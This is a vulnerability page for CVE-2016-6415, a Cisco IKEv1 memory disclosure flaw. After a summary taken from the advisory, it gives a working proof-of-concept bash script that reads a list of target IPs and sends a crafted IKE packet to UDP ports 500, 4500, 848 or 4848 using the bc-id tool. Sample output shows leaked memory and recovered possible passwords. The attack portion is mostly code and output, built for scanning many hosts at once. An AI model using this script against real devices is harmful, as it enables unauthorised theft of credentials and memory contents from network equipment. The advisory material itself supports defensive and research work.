Vuln - Cisco - CVE-2016-6415 - IKE Information Disclosure

Summary
A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information.

The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information.

Cisco will release software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1

Poc

# [+] ---- Fingerprint: ---- [+]# cisco pix# cisco pix 6# cisco pix 7## 500/udp open  isakmp  udp-response Cisco VPN Concentrator 3000 4.0.7# Cisco Systems, Inc./VPN 3000 Concentrator Version 4.7.2.L built by vmurphy on Jun 11 2007 14:07:29# Vendor: Cisco Systems, Inc.# Cisco Systems, Inc. 12.2# Cisco Systems, Inc. 12.4# Cisco Systems, Inc. 15.5# Cisco Systems pix# Cisco VPN Concentratorfunction exploit{if [ -z "$1" ]; then  echo "[*] please set a valid ip, ex: 8.8.8.8";  exit 0;fiif [ -z "$2" ]; then  echo "[*] please set a valid port, ex: 500, 4500"fiip="$1"port="$2"echo -e "[*] sending [$payload] -> $ip: $port"timeout 6s ./bc-id -t $ip -p $port -I "sendpacket.raw"}# UDP port 500# UDP port 4500, NAT Traversal (NAT-T)# UDP port 848,  Group Domain of Interpretation (GDOI)# UDP port 4848, GDOI NAT-Tfunction main{  echo "1) exploit port 500";  echo "2) exploit port 4500";  echo "3) exploit port 848";  echo "4) exploit port 4848";  read -p "[*] please make a choice: " choice  read -p "[*] please set a valid iplist: " iplist  for ip in $(cat $iplist); do    case $choice in        1) exploit $ip 500;;        2) exploit $ip 4500;;        3) exploit $ip 848;;        4) exploit $ip 4848;;    esac  done}main

If you exploit the target successfully, information is as follow:

Connection established.Opening input file sendpacket.raw....Sending packet to 192.168.1.2....Waiting for a response from 192.168.1.2....Writing response to 192.168.1.2.raw....Writing response to 192.168.1.2.hex....Packet recieved:   3e 35 c7 07  29 df ed ef  8e 35 0e 85  0e c6 7f a3   >5..)....5......  ....  ....  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00   ................  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00   ................  00 00 00 00  00 00 00 00  00 00 00 00                   ............  Total bytes printed = 2540Parsing response....  Value found is: 0x441e2300  Version matches:     None.  Unknown value.  Possible passwords:    <<<<    <<<<1    <<<<    <<<<    abcde1    abcde1    tQQwQQdp

Scan Targets

If you want to scan multi targets, please try Packet Structure with your program:

1. IP/UDP/ISAKMP2. ISAKMP == sendpacket.raw

Download sendpacket.raw

References

1. https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110
2. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1
3. https://tools.cisco.com/security/center/selectIOSVersion.x
4. https://isakmpscan.shadowserver.org/
5. http://www.freebuf.com/vuls/115207.html
6. http://www.freebuf.com/news/115118.html
7. https://twitter.com/marcan42/status/766346343405060096
8. https://nmap.org/nsedoc/scripts/ike-version.html
9. http://www.cisco.com/c/en/us/about/security-center/identify-mitigate-exploit-ikev1-info-disclosure-vuln.html
10. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6415
11. https://github.com/rapid7/metasploit-framework/issues/7371